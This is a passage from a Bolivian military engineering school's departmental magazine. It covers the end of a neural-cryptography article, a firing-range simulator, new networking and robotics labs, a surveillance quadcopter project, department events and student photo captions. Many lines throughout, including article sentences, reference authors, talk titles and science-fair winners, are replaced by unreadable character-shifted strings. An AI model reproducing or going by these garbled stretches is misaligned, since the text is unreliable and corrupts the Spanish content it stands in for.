M\UJP}U/HZO:OHJVULSÄUKLZLY\[PSPaHKVZ
por el algoritmo de criptografía AES para cifrar textos como también descifrarlos.
Es por eso que este nuevo método podría ser un
YLLTWSHaVLÄJHa`ZLN\YVWHYHV[YVZTt[VKVZX\L
J\LU[H JVU SH ZLN\YPKHK Z\ÄJPLU[L WHYH X\L H \U
PU[LYJLW[VY SL ZLH KPÄJPS JVUZLN\PY SH PUMYVTHJP}U
JVUÄKLUJPHS
REFERENCIAS BIBLIOGRAFICAS
‹ +PHa 4 Protocolo de intercambio de
claves utilizando redes neuronales y sincronización caótica.
‹ 2HU[LY02PUaLS>Cryptography based on neural networks. Würzburg.
‹ 3\JLUH 4 Criptografía y Seguridad en
Computadores.
‹ 4VYHLZ + 9 Troca de Chaves CriptoNYmÄJHZ\[PSPaHUKV*YPW[VNYHMxH5L\YHS. Marília.
‹ 9\[[VY ( Neural Synchronization and
Cryptography. Obtenido de http://arxiv.org/
pdf/0711.2411.pdf
‹ 9\[[VY(>VSMNHUN2Neural Cryptography with feedback. Würzburg.
‹ :LVHUL-Probabilistic Attack on Neural
Cryptography. Berlin.
PROYECTOS DE LA CARRERA
SIMULACIÓN TÁCTICA Y
PRÁCTICA DE TIRO EN
INSTITUCIONES MILITARES.
Ing. Germán Pereira Muñoz
Departamento de Ingeniería de Sistemas – Escuela Militar de Ingeniería
Irpavi (La Paz) Bolivia
Se está desarrollando un sistema electrónico para un
simulador de prácticas de tiro sobre una plataforma virtual en PC en instituciones militares con sensores. Este
proyecto nace por la falta de prácticas de tiro, que hace
imprecisos en su puntería a los soldados. Realizando
una investigación sobre las herramientas utilizadas en
otros países, se pudo deducir el uso de simuladores
para aumentar la potencia de su ejército.
Todo ejército tiene horas de práctica de tiro para los soldados, estas indican un costo elevado para el país, por
lo que con ayuda de la tecnología podemos realizarlas
de manera virtual, ejecutándolas para mayor cantidad
de soldados y tiempo.
La mejora de prácticas de tiro para los soldados, con
experiencia en precisión. Prácticas de tiro realizadas de
manera manual
El objetivo principal es aumentar la práctica de tiro en
instituciones militares y lograr una mayor práctica de
tiro antes de ir al polígono. Simular todas las condiciones para que un soldado reciba una instrucción completa.
P
A
R
A
D
I
G
El simulador para prácticas de tiro aborda dos aspectos
importantes que son:
‹ )HQHKLJVZ[VZWHYHKPJOHZWYmJ[PJHZ
‹ 4H`VY [PLTWV KL MVYTHJP}U LU PUZ[Y\JJP}U KL
tiro.
Este simulador se implementaría de forma directa a
toda instrucción a todo nivel, es decir, que los alumnos,
cadetes y cualquier soldado podrían realizar su práctica, aumentando la precisión y experiencia de tiro.
El sistema electrónico que se plantea se encuentra ya
funcional en su segunda versión en prototipo como se
ve en las siguientes imagenes:
M
A
73
P
A
R
A
D
I
LABORATORIOS DE REDES Y ROBÓTICA
La implementación del diseño curricular basado en
competencias, que en la presente gestión empezó
con el primer año y en el 2014 continuará con el
segundo año y así sucesivamente, implica la formación de los estudiantes no solo con énfasis en
los fundamentos teóricos de las asignaturas, sino
fundamentalmente en el saber hacer y saber ser, es
decir, requiere que la Carrera disponga de laboratorios de última generación que posibiliten una plena
vigencia del nuevo plan de estudios.
Con este propósito, la jefatura de Carrera, a cargo
del Tcnl. Julio César Narváez Tamayo, ha elaborado
los proyectos para la adquisición e implementación
de los laboratorios de Redes y de Robótica, los cuales han sido aprobados por las autoridades superiores de la EMI y se incorporaron al POA de la gestión
2013, realizándose la respectiva licitación pública.
La empresa Alpha Systems se adjudicó el laboratorio de Redes, entregó los equipos CISCO, marca
líder del mercado, estando a la fecha en proceso de
prueba para el inicio de actividades a partir del mes
de enero de 2014. El laboratorio de Redes fue inaugurado por autoridades superiores de la EMI, con la
denominación de “MSc. Fernando Yañez Romero”,
en homenaje y agradecimiento al prestigioso profesional, docente emérito de la EMI y de la UMSA, que
durante 20 años de trabajo contribuyó a que la Carrera se consolide como una de las mejores del país
Tcnl. Narváez en palabras de circunstancia
A
74
Participantes del acto inaugural
El laboratorio de Robótica continúa en proceso de
licitación, teniéndose prevista su adjudicación an[LZ KL ÄU KL H|V 3VZ LX\PWVZ KL LZ[L SHIVYH[Vrio serán de última generación y permitirán que los
estudiantes adquieran competencias profesionales
en el área de robótica y automatización. Asimismo
apoyarán a la maestría en robótica y automatización que será una alternativa de formación de postgrado para los egresados de la Carrera
Ambos laboratorios serán administrados por la Carrera, pudiendo ser utilizados por otras Carreras de
la EMI y por el postgrado.
G
M
El laboratorio de Redes cuenta con equipos de última generación que permitirán dotar a los estudiantes de competencias para el ejercicio profesional
idóneo. El laboratorio tiene múltiples potenciales
aplicaciones extracurriculares, tales como permitir
a la EMI constituirse en una Academia de Networking de Cisco, así como prestar servicios a otras
entidades, en el área de redes y comunicaciones.
Lic. Yañez agradece la nominación
DESARROLLO DE UN ALGORITMO
DE CONTROL PARA UN VEHICULO
NO TRIPULADO UTILIZANDO LA
TECNOLOGIA GPS
Ing. German Pereira Muñoz
Est. Diego Bruno Flores Salazar
Est. Alex Ariel Orellana Ramirez
Departamento de Ingeniería de Sistemas – Escuela Militar de Ingeniería
La Paz - Bolivia
RESUMEN
Modelar, desarrollar e implementar el algoritmo de
control de un vehículo aéreo multirotor no tripulado,
utilizando la tecnología GPS para realizar vuelos de
búsqueda, reconocimiento y vigilancia para disminuir la inseguridad ciudadana en la zona de Irpavi..
ANTECEDENTES
Según las revistas de victimización en Bolivia de la
ONSC En las ciudades del eje central, 4 de cada
10 hogares (44%) fueron víctimas de al menos un
delito en los últimos 12 meses (robo, hurto, robo de
vehículos, robo de autopartes, robo en vivienda y
violencia). [ONSC; 2012]
Como se puede observar en la Figura 1., los resultados de la encuesta revelan altos niveles de victimización en las cuatro ciudades, pero los mayores
se presentan en Cochabamba, donde más de 5
hogares de cada 10 han pasado por la experiencia
de un delito o un hecho de violencia, y en El Alto
esta experiencia afectó a un poco menos de 5 de
cada 10 hogares. En términos generales, La Paz y
Santa Cruz presentan niveles de victimización menores al total de hogares victimizados. En ambas,
la actividad delictiva afectó a 1 hogar menos que
en Cochabamba y El Alto durante los últimos doce
meses. En términos porcentuales, La Paz presenta
un 17,6% menos de hogares víctimas que en Cochabamba y Santa Cruz un 16,7%. [ONSC; 2012]
La Alcaldía mayor de Bogotá adelanta un plan piloto para determinar si integra al sistema de seguridad local el uso de Vehículos Aéreos no Tripulados
(VANT), también conocidos como DRONES. “Además nos ayudarán con los mapas y la cartografía,
en la vigilancia de proliferación de residuos, en la
LÄJPLUJPHKLSHYLJVSLJJP}UKLHZLV`LULSZLN\Pmiento al daño ecológico”, indico el alcalde de Bogotá. [WEB 03; EL TIEMPO; 2013]
Michael Bloomberg 2013, alcalde de Nueva York,
lo tiene claro: la seguridad es lo primero y por este
motivo no va a escatimar en esfuerzos para lograrla.
El mandatario asume también que hay que adaptarse a los nuevos tiempos y en este sentido, en una
entrevista radiofónica, no ha dudado en aseverar
que los DRONES de vigilancia “son inevitables” en
la ciudad estadounidense, y que más vale que nos
vayamos acostumbrando. Bloomberg ha querido
atajar de esta manera las posibles polémicas en torno a la privacidad: “¿Cual es la diferencia entre una
JmTHYHÄQHLU\ULKPÄJPV`\U+965,ZVIYL]VSHUKV
la ciudad? “, se pregunta, para luego continuar “nos
adentramos en un mundo diferente y hay cosas que
no se pueden evitar”. [WEB 04; ENGADGET; 2013]
1\Z[PÄJHJP}UKLS[LTH
,S KLZHYYVSSV KLS WYV`LJ[V ZL Q\Z[PÄJH KL THULYH
PUZ[P[\JPVUHS KLIPKV HS ILULÄJPV X\L WYL[LUKL HScanzar no únicamente al campo de la vigilancia,
sino al control autónomo y la aplicación de los UAV
enfocando en primera instancia un área de aplicación y posteriormente se recomienda la investigaJP}U ` KLZHYYVSSV WHYH KP]LYZPÄJHY SHZ HJ[P]PKHKLZ
del UAV.
Desarrollo del tema
Diagramas de Bloques del Cuadracóptero
Figura 1: [Primera revista de Victimización de la
ONSC]
A continuación se presenta el diagrama de bloques
a grandes rasgos con el cual se va proceder con
P
A
R
A
D
I
G
M
A
75
P
A
el modelado del cuadracóptero desarrollado. Cada
uno de los bloques representa un subsistema que
será diseñado y validado por aparte, para luego
formar parte de todo el sistema. Esto permite segmentar el proyecto en diversas etapas las cuales
hacen que la validación y la puesta en funcionamiento de cada una de ellas resulte más accesible
al desarrollador.
<UH]LaJVUÄN\YHKVLSMYHTL`HQ\Z[HKVZSVZTV[VYLZ ZL WYVJLKL H \UH ]LYPÄJHJP}U KL JHYNH ‚[PS
por cada rotor utilizado, por otra parte se debe implementar los controladores de velocidad (uno por
cada rotor)
R
A
D
Cabe aclarar que el cuadracóptero que construido,
ZLKPZL|}LUJVUÄN\YHJP}U¸_¹
Construcción del Quadcopter
La construcción se basa en un soporte de aluminio
LUMVYTHKL¸/¹JVTVZLW\LKLVIZLY]HYLUSHÄN\YHSHJVUÄN\YHJP}UKLS}NPJHLZ¸?¹
Una vez concluida las pruebas de cada rotor se coULJ[H HS JVU[YVSHKVY WVZ[LYPVYTLU[L ZL JVUÄN\YH
LSJVU[YVSHKVYZLN‚USHZLZWLJPÄJHJPVULZKLSMHIYPcante.
I
G
Se realiza la determinación de la posición que ocupara el controlador:
M
Conclusiones
La construcción de un vehículo aéreo no tripulado
como puede observarse no es complicada, los ámbitos de aplicación son variados, desde aplicaciones civiles.
A
76
:LKL[LYTPUHLS[PWVKLJVUÄN\YHJP}UKLSVZYV[Vres.
7HYH VI[LULY \UH JVUÄHIPSPKHK Z\WLYPVY ZL ULJLsita el desarrollo de distintas pruebas en diferentes
ambientes.
INSTITUCIONALIZACIÓN DE LAS
JORNADAS DE LA CARRERA DE
INGENIERÍA DE SISTEMAS
Ing. Freddy Medina Miranda
Departamento Ingeniería de Sistemas – Escuela Militar de Ingeniería
Irpavi (La Paz) Bolivia
Telf.: 71520811
e-mail: [email protected]
RESUMEN
OBJETIVOS
En el Artículo se presenta los antecedentes, objetivos, actividades y la organización, que constituyen los elementos para la institucionalización de las
Jornadas de la Carrera de Ingeniería de Sistemas.
Las Jornadas de la Carrera tienen los objetivos siguientes:
-
ABSTRACT
The article presents the background, objectives,
activities and the organization, which constitute elements for the institutionalization the “Jornadas” of
the systems engineering career.
ANTECEDENTES
La Carrera de Ingeniería de Sistemas fue creada
mediante Resolución Nº 0391/91 del Comando en
Jefe de las Fuerzas Armadas de la Nación, el 3 de
febrero de 1991.
La necesidad de incorporar los últimos avances de
la ciencia y la tecnología, que en el área de la Ingeniería de Sistemas se presentan en periodos muy
cortos de tiempo, ha dado lugar a que el plan de
estudios se actualice en promedio cada cinco años;
la última versión, resultante de un diseño curricular
por competencias, tiene vigencia del 2013 al 2017.
3H*HYYLYHJVULSWYVW}ZP[VKLJLY[PÄJHYSHMVYTHción profesional de primer nivel que proporciona a
sus estudiantes, obtuvo acreditación internacional,
con el CACEI, en el año 2004 y se ha re acreditado
con excelencia en el año 2010.
Los pilares de la universidad son la docencia, la investigación y la interacción social.
-
Contribuir a la plena implementación de la
interacción social en el proceso enseñanza
aprendizaje.
Desarrollar actividades de interacción entre
estudiantes y docentes que contribuyan a la
adquisición de las competencias del saber
ser y del saber hacer en las distintas asignaturas de la Carrera.
Reforzar el componente de interacción social
en los procesos de autoevaluación y acreditación.
Celebrar el aniversario de creación de la Carrera
Premiar a los ganadores de las distintas actividades organizadas por la Carrera a lo largo
del año.
P
A
R
A
D
I
ACTIVIDADES
Las Jornadas comprenden las siguientes actividades:
1) INAUGURACIÓN
Las Jornadas se inauguran en acto sujeto a programa especial, con participación de autoridades de
la EMI y de la comunidad docente y estudiantil de
la Carrera.
LUGAR: Auditorio de la sede Irpavi de la EMI.
2) CICLO DE CONFERENCIAS.
En el modelo académico basado en competencias
profesionales, se hace énfasis en el aprendizaje del
estudiante, en el que tienen relevante importancia
la investigación y la interacción social.
Son exposiciones sobre temas de actualidad del
área, a cargo de representantes de instituciones
gubernamentales y empresas privadas del medio.
Las actividades académicas en la EMI, cada año,
se inician después del día aniversario de la Carrera.
OBJETIVO: Presentar a la comunidad docente estudiantil de la Carrera temas del área, relacionados
G
M
A
77
P
A
R
con la problemática nacional actual y con la implementación en el medio de los últimos avances tecnológicos en Ingeniería de Sistemas.
TIEMPO DE DURACIÓN: 45 minutos de exposición y debate por conferencia.
OBJETIVO: Incentivar el compañerismo de estudiantes y docentes de la Carrera.
LUGAR: Campus Alto Irpavi de la EMI
LUGAR: Auditorio de la EMI sede Irpavi.
6) CLAUSURA DE LAS JORNADAS
3) CURSOS TALLER
Es un acto sujeto a programa especial, donde se
clausuran las Jornadas y se realiza la premiación
a los ganadores de los eventos deportivos y de las
distintas actividades programadas por la Carrera a
lo largo del año.
Son cursos en los que se hace énfasis en el saber
hacer.
OBJETIVO: Complementar los conocimientos adquiridos en las distintas asignaturas de la Carrera,
con el aprendizaje de técnicas y herramientas vigentes de la Ingeniería de Sistemas.
A
TIEMPO DE DURACIÓN: 20 horas académicas.
D
CERTIFICACIÓN: Se otorgan a los participantes
JLY[PÄJHKVZ KL ]HSVY J\YYPJ\SHY KL SH LU[PKHK X\L
provee los disertantes y de la Carrera.
DISERTANTES: Capacitadores invitados de entidades de prestigio del medio, especializadas en el
área.
G
M
A
78
OBJETIVO: Clausurar los Jornadas y premiar a los
ganadores de la Feria de Ciencia y Tecnología, la
competencia de programación, los campeonatos
deportivos y otros eventos organizados por la Carrera y por otras entidades del medio, en los que
participaron estudiantes y docentes de la Carrera.
LUGAR: Campus Alto Irpavi de la EMI.
RESOLUCIÓN DE INSTITUCIONALIZACIÓN
LUGAR: Laboratorios de computación sede Irpavi
de la EMI.
I
docentes y estudiantes de la Carrera preparan y
comparten un refrigerio y números musicales.
4) CAMPEONATOS DEPORTIVOS
La Resolución de Institucionalización de las Jornadas, emitida por el Consejo de la Carrera de Ingeniería de Sistemas, determina el 19 de Septiembre
como fecha de celebración del aniversario de la
Carrera, en homenaje al nacimiento de Ludwing
von Bertalanfy, autor de la Teoría General de sistemas, fundamento de la profesión.
El día de la clausura de las Jornadas (sábado), se
Q\LNHUSHZÄUHSLZKLSVZJHTWLVUH[VZKLKPZ[PU[HZ
disciplinas: fulbito, basketball, voleyball, raqueta y
otros, que se inician con dos semanas de anterioridad.
CONCLUSIONES
OBJETIVO: Incentivar el compañerismo y el trabajo
en equipo de estudiantes y docentes de la Carrera.
Los cursos taller, promueven la investigación al
dotar a los estudiantes del conocimiento teórico
práctico de herramientas y técnicas vigentes en el
mercado laboral.
PARTICIPANTES: Un equipo de estudiantes por
curso (semestre) en cada disciplina, asimismo participan equipos de docentes.
LUGAR: Campus Alto Irpavi de la EMI.
5) EVENTO DE CONFRATERNIDAD
El día de la clausura de las Jornadas se realiza un
evento de confraternidad, en el que autoridades,
La participación en actividades de grupo durante
las Jornadas, contribuye favorablemente al trabajo
en equipo y al aprendizaje colaborativo.
La premiación incentiva la participación en eventos
que apoyan a la investigación aplicada, principalmente la Exposición de Ciencia y Tecnología y la
Competencia de Programación.
ACTIVIDADES DE LA CARRERA DE
INGENIERIA DE SISTEMAS
PREMIO EMPRENDEDORES
CON EL AUSPICIO DEL GOBIERNO AUTONOMO MUNICIPAL DE LA PAZ
En el auditorio de la Escuela Militar de Ingenieria se realizó el taller para conformar y capacitar grupos de
estudiantes innovadores con ideas de negocios o servicios, formando nuevos lideres en la generacion de
nuevas empresas.
P
A
R
A
Representante expositora
Gobierno Autonomo Municipal de La Paz
Presencia de Estudiantes de la carrera de
Ingenieria de Sistemas
COMPETENCIA DE PROGRAMACIÓN
“HACKATON 2013”
El 23 de agosto se realizó la competenecia de programación “HACKATON 2013” con el auspicio del Gobierno Autonomo Municipal de La Paz y CPM. El acto inaugural se realizó en el auditorio del GAMLP, con
palabras del Ing. Wilmer Pimentel.
D
I
G
Encargados del CPM. fueron jueces para la programación en diferentes lenguajes como ANDROID, HTML
5 y Java entre otros.
M
A
79
P
Estudiantes de diferentes semestres de la carrera quienes representaron a la EMI, obtuvieron los siete primeros lugares en la premiacion de dicho evento.
A
R
A
Acto de premiacion al terminar la jornada
de programacion
Los ganadores fueron merecedores a
diferentes becas de estudio
CAMPEONATO INTERNO DE LA CARRERA DE INGENIERÍA DE SISTEMAS
Como parte de la celebración del aniversario de la carrera se desarrollaron campeonatos deportivos en las
disciplinas de Basketball, Volleyball, Raqueta y Futsal.
D
I
Primer lugar en la disciplina de Futsal
[V:LTLZ[YL
Primer lugar en la disciplina de Voleibol y
)mZX\L[IVSTV:LTLZ[YL
Segundo lugar en la disciplina de Futsal
8vo. Semestre
Final de Frontón
Primer lugar en la disciplina de Raquet
Cnl. Juan Franco Vaca y Tcnl. DIM. Julio Cesar Narváez
Tamayo
Final de Basketball
G
M
A
80
II JORNADAS DE INGENIERÍA DE SISTEMAS 2013
Del 2 al 5 de octubre se realizaron las II Jornadas de Ingeniería de Sistemas, con el propósito de desarrollar
actividades de interacción social e investigación complementarias al Proceso Enseñanza Aprendizaje y de
celebrar el 23 aniversario de la Carrera.
Para consolidar la realización de las Jornadas en los años futuros, el Consejo de Carrera emitió la resolución No. 03/2013, en la que se aprueba la celebración del aniversario de la Carrera en la primera semana
de octubre, considerando que el 1 de febrero, fecha de creación, no hay actividades académicas.
El acto inaugural se realizó en el auditorio de la EMI, sede Irpavi, con palabras del Tcnl. DIM. Julio César
Narváez Tamayo, Jefe de Carrera de Ingeniería de Sistemas y del Cnl. DAEN. Álvaro Ríos Oliver, Director
de la Unidad Académica La Paz.
P
A
R
A
D
Cursos Taller
En los laboratorios de computación, especialistas de la empresa EDUCOMSER dictaron los cursos de ANDROID, HTML 5 y Servidores LINUX, con la masiva participación de los estudiantes de la Carrera.
I
G
3HIVYH[VYPV(5+960+
3HIVYH[VYPV¶/;43
M
A
3HIVYH[VYPV¶:,9=0+69,:305<?
3HIVYH[VYPV(5+960+
81
P
A
El Jefe de Carrera con Estudiantes de
[V:LT
El Jefe de Carrera con Estudiantes de
[V:LT
R
A
Estudiantes de 10mo. Sem. con la Sra. Lorena Miranda,
Secretaria de la Carrera
D
Conferencias
Con la activa participación del Ing. Sergio Toro y de la Ing. Patricia López, en el auditorio de la sede Irpavi
se desarrollaron las conferencias programadas como parte de las II Jornadas de la Carrera
I
G
M
Lic. Roberto Sánchez.
Director Nacional de Ciencia y Tecnología del Ministerio de EduJHJP}U;LTH!,S:H[tSP[L;\WHJ2H[HYP`Z\ZHWSPJHJPVULZ
Ing. Sergio Toro, Lic. Roberto Sánchez;
Tcnl. Cesar Narváez
Ing. Germán Labraña.
Director de Tecnologías de la Información del Viceministerio de
Ciencia y Tecnología.
;LTH!0UMYHLZ[Y\J[\YH;LJUVS}NPJHWHYH,K\JHJP}U
0UN9VILY[VAHTIYHUH+PYLJ[VY+LZHYYVSSV6YN`
TIC’s del GMLP.
;LTH!:LTmMVYVZ0U[LSPNLU[LZ`V[YHZPUUV]HJPVULZ
A
82
P
A
Tcnl. Cesar Narváez, Ing. Roberto Zambrana
Ing. Ing. Javier Berthin.
Jefe Nacional de Soporte Internetworking
Alpha Systems SRL.
;LTH!*VSHIVYHJP}U`*VT\UPJHJPVULZ<UPÄJHKHZ
R
A
Tcnl. Cesar Narváez, Ing. Javier Berthin.
0UN/\TILY[V(IHZ[V1LMLKL:PZ[LTHZ(;;
;LTH!-PYTH+PNP[HS
D
I
0UN/\TILY[V(IHZ[V;JUS*LZHY5HYváez
0UN4HYxH4VYHSLZ.\[PtYYLa
.LYLU[LKL4HYRL[PUN*636:(
;LTH!-HIYPJHKLZVM[^HYL
G
M
A
Tcnl. Cesar Narváez, Ing. María Morales
.\[PtYYLa
Participación activa de Estudiantes y
Plantel de Docentes
83
P
A
XI EXPOSICIÓN DE CIENCIA Y TECNOLOGÍA
EXPOCITE SISTEMAS 2013
El viernes 23 de agosto de Hrs. 9:00 a 13:00 se realizaró la IX FERIA EXPOSICION DE CIENCIA Y TECNOLOGÍA “EXPOCITE SISTEMAS 2013”, en la sede Irpavi de la Unidad Académica La Paz, con el propósito
de presentar a la comunidad los proyectos de investigación elaborados por los estudiantes de la Carrera.
En la presente gestión, además se expusieron proyectos de aplicación para las Fuerzas Armadas, en cumplimiento de las políticas de investigación de la EMI.
Ganadores de la Feria de Ciencia y Tecnología
Categoría A:
Categoría B:
R
A
7YPTLYS\NHY!*VUZ[Y\JJP}UKL\UTPUP
robot
7YPTLY3\NHY!:PZ[LTHKL4VK\SHJP}UWVY
ancho de pulso
:LN\UKVS\NHY!9LN\SHKVYKL[LTWLYHtura
:LN\UKVS\NHY!:PZ[LTHKL,Z[LNHUVNYHfía basado en imágenes
;LYJLYS\NHY!:PZ[LTHKL:LN\YPKHKWHYH
la Carceleta de la Policía Militar
;LYJLYS\NHY!4VKLSVKLHWSPJHJP}UKL
una red estructurada para los Cuarteles
D
I
G
M
A
84
De izquierda a derecha: Marcos Mauricio Landívar Fernández, Gabriel Calle Jurado, Willy Lliulli Herrera, Wilson Reas Alanoca, Behimar Moisés Alvarado
Aranda, Lía Alexi Marín Quispe, Yvory Saavedra Daza, Jhosely Cruz Mamani, Santos Manolo Alarcón Alarcón, Jhoselyn Pamela Torrez Apaza, Ted Carrasco Carrasco, Iris Narella Luna Maidana, Francis Ángel Rojas López, Brandon Felipe Merlo Loza, William Castro Ayaviri, Henry Iván Quispe Acarapi
3er. Semestre
P
A
R
A
D
I
G
M
A
85
A
D
I
A
R
M
A
86
De izquierda a derecha: Paricagua Siñani José Junior - Sánchez De La Cruz Ingrid Magaly - Mamani Quispe Walter Fernando - Abendaño Joseline Gabriela - Mamani Gutiérrez Freddy Bernardo - Dávila Tapia Lizeth Dayana – My. Ing. Palenque Ríos Erick Rolando - Quispe Jerónimo Judy Adriana - Jáuregui
Salvatierra Diego - Mercado Gallardo Valeria Diana - Calvo Llanos José Ignacio - Ortuño Calvo Yury Yver - Limachi Herrera Dany Milton
G
4to. Semestre
P
De izquierda a derecha: Mendoza Alarcón William Cesar, Mamani Foronda Félix Adrián, Tiniñi Coaquira Eyvind Emilio, Sánchez Gamboa Maya Isabel, Machaca Yapura Grecia Jorgelinda, Álvarez Chura Alejandra Stefany, Blanco Paucara Erik Abraham, Gutiérrez Guarachi Carlos Jesús
5to. Semestre
P
A
R
A
D
I
G
M
A
87
A
D
I
A
R
M
A
88
De izquierda a derecha: Marino Peralta Diego Luis-Silvestre Castillo Roberto- Ayraldi Loza Yamilka Madai- Tte. Com. Sánchez Montalvo Rolando- Yujra
Nina Giovana Edith- Quispe Flores Heber –Antequera Crespo Roger Oscar
G
6to. Semestre
P
De izquierda a derecha: Bismark Jaime Rojas Córdova - Diego Carlos Feraudy Pinto - Mischell Sonia Huchani Huchani - Rudy Alanoca Solozano Rosario Cristal Canaviri Calisaya - Yeri Antonio Revollo Endara - Jessica Reina Tancara Zabala - Sergio Alejandro Morales Zubieta - Gabriela Marisol
Espinoza Montes - Jorge Luis Castañeta Guachalla - Danitza Helen Vallejos Quiñones - Raúl Marco Antonio Colque García - Daysi Patty Ramírez Cesar Antonio Narváez Gutiérrez - Soledad Silvia Gutiérrez Parra
7mo. Semestre
P
A
R
A
D
I
G
M
A
89
A
D
I
A
R
M
A
90
De izquierda a derecha: Pedro Ariel Castillo Mollinedo, Vladimir Vargas Álvarez, Vania Chipana Rollano, Jorge Hernando Candia Menacho, Yashira Melisa
Ticona Mujica, Carlos Alexandro Pomares Nina, TF. CGON. Raúl Gilmar Cortez Laura, Ana Laura Castillo Alfaro, TF. CGON. Mario Rubén Ontiveros Daza,
Bryan Reynaldo Ponce Contreras, Wara Vanesa Siñani López, Ademir Nina Miranda, Ximena Lisett Cangri Toro, Ricardo Trujillo Castañeta, Omar Chambi
Torrez.
G
8vo. Semestre
P
De izquierda a derecha: Navia Ortuño Walter Junior, Tapia Quezada Fidel Alejandro, Yujra Tucupa Romer, Del Villar Vásquez Douglas Leonard, Miranda Apala Gonzalo,
Challco Chalco Robert Jonathan, Tinta Gómez Edwin Santos, Loza Mamani Miguel Ángel, Chávez Ramírez Khendy Mariela, Huallarte Huallarte Marcelo Rilmar, Gutiérrez
Villegas Claudia Inés, Rivero Ruiz Rene Andrés, Aliaga Nisttahuz Dhemelza Paola, Orellana Ramírez Ariel Alex, Quisbert Anti Israel, Loza Quenta Jhonny Gabriel, Mamani
Murga José Ignacio, Flores Salazar Diego Bruno, Yampasi Espejo Juan Jesús, Terrazas Rollano Saúl Meyer, Cortez Calle Jorge Cristóbal
9no. Semestre
P
A
R
A
D
I
G
M
A
91
A
D
I
A
R
M
A
92
De izquierda a derecha: Bernardo Vargas Rivera, Sergio Rodrigo Terrazas Zenteno, Rodrigo Ledezma García, Rubén Cristhian López Quiroga, Juan José Alvarado Ramos,
Juan Pablo Conde Mendoza, Diego Alejandro Alcoba Ortega y Daniel Julio Poppe Villa Romero.
De izquierda a derecha: Luz Tatiana Canqui Mamani, Kely Jesmy Aguilar Alejo, Rocío Fabiola Angulo Velásquez, Ariana Wara Condo Lazarte y Luz Alejandra Soto Tapia
G
10mo. Semestre
P
P
A
R
A
D
I
G
M
A
93
P
A
R
A
D
I
G
M
A
94
P
A
R
A
D
I
G
M
A
95
P
A
R
A
D
I
G
M
A
96
P
A
R
A
D
I
G
M
A
97
P
A
R
A
D
I
G
M
A
98
P
A
R
A
D
I
G
M
A
99
P
A
R
A
D
I
G
M
A
100
MISIÓN
Formar y especializar profesionales de excelencia con valores éticos, morales y cívicos;
caracterizados por su responsabilidad social, liderazgo y disciplina, promoviendo la
interacción social, la investigación científica y tecnológica, a fin de participar activamente
en el desarrollo integral y sostenible del país.
VISIÓN
Ser la Universidad de mayor presencia en el país, con prestigio internacional y oferta
académica en diversas áreas del conocimiento.
Carreras
VIGENTES
LA PAZ
INGENIERIA AGRONOMICA
INGENIERIA AMBIENTAL
INGENIERIA CIVIL
INGENIERIA COMERCIAL
INGENIERIA EN SISTEMAS ELECTRONICOS
INGENIERIA DE SISTEMAS
INGENIERIA GEOGRAFICA
INGENIERIA INDUSTRIAL
INGENIERIA PETROLERA
INGENIERIA AGROINDUSTRIAL
TECNICO SUPERIOR EN ANALISIS DE SISTEMAS
TECNICO SUPERIOR EN SISTEMAS ELECTRONICOS
Carreras
NUEVAS
INGENIERIA ECONOMICA
INGENIERIA FINANCIERA
INGENIERIA QUIMICA
INGENIERIA DE MATERIALES
INGENIERIA EN TELECOMUNICACIONES
INGENIERIA MECATRONICA
INGENIERIA MECANICA
COCHABAMBA SANTA CRUZ
RIBERALTA
Descargar